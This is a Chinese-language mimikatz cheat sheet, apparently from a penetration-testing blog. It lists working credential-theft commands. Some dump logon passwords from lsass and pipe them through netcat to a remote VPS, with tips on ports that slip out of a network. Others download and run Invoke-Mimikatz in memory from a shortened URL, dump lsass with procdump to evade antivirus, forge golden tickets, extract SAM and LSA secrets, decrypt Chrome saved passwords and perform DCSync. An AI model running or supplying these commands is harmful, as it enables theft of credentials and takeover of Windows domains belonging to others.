0x00 非交换式
打印(输出)mimikatz执行过程的log
1 | mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir |
读取的密码导出在mimikatz的目录,然后用webshell 将log文件copy到web下,在线访问
1 | mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt |
nc到vps
非交互抓明文,不留任何文件,直接把抓取结果用nc发到指定的远程机器(一般是自己的vps)上,可能有些端口出不来,换几个常用的即可,80,8080,443,53……1
2mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit | nc -vv 192.168.3.251 1234 在目标机器上执行
nc -lvp 1234 本地(vps上)机器执行
0x01 两种免杀方式
1) 使用powershell
1 | powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds" |
Tips:
powershell 默认windows visa后才有。也可以将结果发送到vps上。
2) procdump lsass 进程导出
1 | C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp //For 32 bits |
- 本地使用mimikatz还原
1
2
3mimikatz.exe
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
0x02 日常使用
1) 黄金票据
1 | [*] 制作 |
2) 获取 vpn 密码
1 | mimikatz.exe privilege::debug token::elevate lsadump::sam lsadump::secrets exit |
3) 浏览器密码
1 | mimikatz.exe privilege::debug log "dpapi::chrome /in:\"%localappdata%\\Google\\Chrome\\User Data\\Default\\Login Data1\" /unprotect" exit //读chrome密码 |
4) 获取某用户的密码
1 | mimikatz lsadump::dcsync /domain:rcoil.me /user:rcoil |